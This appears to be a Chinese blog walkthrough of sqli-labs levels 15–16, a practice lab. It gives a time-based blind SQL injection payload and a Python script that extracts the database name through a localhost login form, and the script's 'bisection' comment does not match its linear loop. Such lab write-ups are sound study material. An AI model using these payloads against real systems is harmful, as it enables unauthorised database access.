sqli-labs注入漏洞解析--less-15/16

最新推荐文章于 2024-08-14 11:10:56 发布
最新推荐文章于 2024-08-14 11:10:56 发布
阅读量233 收藏 3
点赞数 1
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/duoba_an/article/details/140927110
版权

第十五关:

加入单引号、双引号、括号等,都没有任何回显信息,这里可以判断为可能是时间盲注

单引号闭合成功

接下来尝试 时间盲注,当ascii为115时,停止1s,当改为其他时没有停止,这里就可以判断出注入点,欧克,直接上之前的脚本,稍作修改

a' or if(ascii(substr(database(),1,1))=115,sleep(1),1)#

import requests
url = "http://127.0.0.1/sqli-labs-php7-master/Less-15/index.php"
#二分法
def inject_database(url):
    name = ''
    for i in range(1,20):
        for j in range(32,129):
            data  = {"uname":"ad' or ascii(substr(database(),%d,1)) = %d# " % (i, j),"passwd":"aaaaa"}
            r = requests.post(url,data=data)
            if "flag.jpg" in r.text:
                name +=chr(j)
                print(name)
                break
            else:
                continue

inject_database(url)

成功拿到数据库名,之后的操作和以前的第九关就是一样的了。

第十六关:

还是老套路,闭合方式发生了改变

简单换一下套路就成功拿下

duoba_an
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
详细sqli-labs(1-65)通关讲解
dreamthe的博客
05-17 14万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
sqli注入详解——>sqli-labs less-1~65
qq_51780583的博客
03-18 825
UNION 操作符用于合并两个或多个 SELECT 语句的结果集。请注意,UNION 内部的 SELECT语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时,每条 SELECT 语句中的列的顺序必须相同。服务器端有两个部分:第一部分为tomcat为引擎的jsp型服务器,第二部分为apache为引擎的php服务器,真正提供web服务器的是php服务器。工作流程为:client访问服务器能直接访问到tomcat服务器,然后tomcat服务器再向apache服务器请求数据。
SQL注入漏洞解析(环境SQLi-labs)
twowords的博客
02-04 1338
SQL注入漏洞详解 什么是SQL注入 原理: Sql注入,由于Web应用程序对用户输入数据的合法性没有判断和过滤,导致后台SQL语句拼接了用户的输入。用户可以通过构造不同的Sql语句来实现对数据库的任意操作。(如:增删改查)。 解释:当我们用户在前端浏览器页面做一些事情的时候,当需要与数据库进行交互时,比如最简单的登陆账号,web应用程序接收到我们账号密码后,需要后台有这样一个数据库的命令,去查询数据库中是否有这样的一个账号密码与之对应,然后做出判断:是否存在用户名,若存在,用户名与密码是否相匹配。然而
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析
热门推荐
Jay17的博客
08-03 3万+
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析 详细,超级详细
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
安装sqli-labs
10-22
本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地Web靶场 在开始安装sqli...
Prostgresql的Timescaledb插件/扩展部署
weixin_45697805的博客
08-14 146
背景:研发需求,需要把docker部署得postgresql迁移到新的节点并要求再本地部署,提前查看数据库需要那些插件,并进行安装,docker部署的默认有插件。
SQL Server 事务
a876106354的博客
08-09 551
SQL Server 事务是数据库操作的一个基本特性,它允许你将一系列数据库操作组合成一个原子单元,这个单元中的所有操作要么全部成功,要么全部失败。事务具有以下四个重要的属性,通常被称为ACID属性。
oracle使用sql生成表结构文档
最新发布
yannsann的博客
08-14 496
客户要求数据资产盘点,需要提供相关表字段的说明文档,指定具体格式。手动是不可能手动的,使用SQL实现。
SQL 索引、约束、外键 —/—<11>
qq_64603703的博客
08-14 731
索引名称应该是一个有效的标识符,并且在表中的索引名称必须是唯一的。其中,index_name是要创建的索引的名称,table_name是要在其中创建索引的表的名称,column1, column2,...是要在索引中包含的列的名称。其中,table_name是要修改的表的名称,index_name是要添加的索引的名称,column1, column2,...是要在索引中包含的列的名称。MySQL索引的建立对于MySQL的高效运行是很重要的,索引可以大大提高MySQL的检索速度。
达梦数据库(十) -------- mybatis-plus 整合达梦时,自动生成的 sql 语句报错
weixin_52466601的博客
08-09 520
问题原因:mybatis-plus 生成的 sql 语句字段是小写的,同时还包含数据库关键字。框架会默认加上(`)符号,该符号在达梦数据库中无法被识别,需要更换为 (")。方案二:修改实体类的字段名称避免使用达梦数据库关键字。
大数据_SQL_5min访问达到100次的用户
迎难而上
08-08 266
某公司网站每日访问量达到10亿级别的访问量,每次访问记录一条数据,数据包含如下字段:用户ID,访问时间(毫秒级),访问页面。要求使用hive求出所有在5分钟内访问次数达到100次的用户(求出用户ID即可)假设存在如下表table_a用户id (uid), 访问事件 (visit_time), 访问页面 (page)
sql常用语法总结
零度°C的博客
08-06 1771
除了基本的内连接(INNER JOIN),还有左连接(LEFT JOIN)、右连接(RIGHT JOIN)和全外连接(FULL OUTER JOIN)。- 允许声明临时的结果集,可以被一个或多个SELECT、INSERT、UPDATE或DELETE语句引用。- 自动执行的SQL语句,通常在INSERT、UPDATE或DELETE操作发生时触发。- 保证一系列操作要么全部成功,要么全部失败,且对数据库的修改是原子性的。- 事务是一组操作,要么全部成功,要么全部失败。- 子查询是嵌套在另一个查询中的查询。
SQL面试题练习 —— 奖金瓜分问题
hu_wei123的博客
08-08 750
现有奖金池为 10000元,代表奖金池中的初始额度。表中的数据代表每一个用户和其对应的得分,user_id 和 score 都不会有重复值。瓜分奖金的规则如下:按照 score 从高到低依次瓜分,每个人都能分走当前奖金池里面剩余奖金的一半,当奖金池里面剩余的奖金少于 250 时(不含),则停止瓜分奖金。现在需要查询出所有分到奖金的 user_id 和其对应的奖金。题目中要求:当奖金池里面剩余的奖金少于 250 时(不含),则停止瓜分奖金。如果无限瓜分下去,看下是什么结果。,排名 rn 的得到的为。
ctfshow-web入门-sql注入(web206-web210)系统练习sqlmap之tamper的使用与编写
Welcome To Myon'Blog !
08-11 951
我们对查询的 payload 进行逆向处理,先反转,再 base64 加密,再反转,再 base64 加密,传入查询后,经过题目的解密和反转处理,最终又恢复到我们正确的 payload 实现注入。查询语句里新增了括号,我们注入也需要将其闭合掉,就像我们闭合单引号那样,对于 sqlmap 它会自动对闭合点进行测试的,常见的就是单引号、双引号、单引号加括号或者双引号加括号。拿下,flag:ctfshow{549d46ab-3974-43a6-ac07-cbcc41357083}
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

duoba_an

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值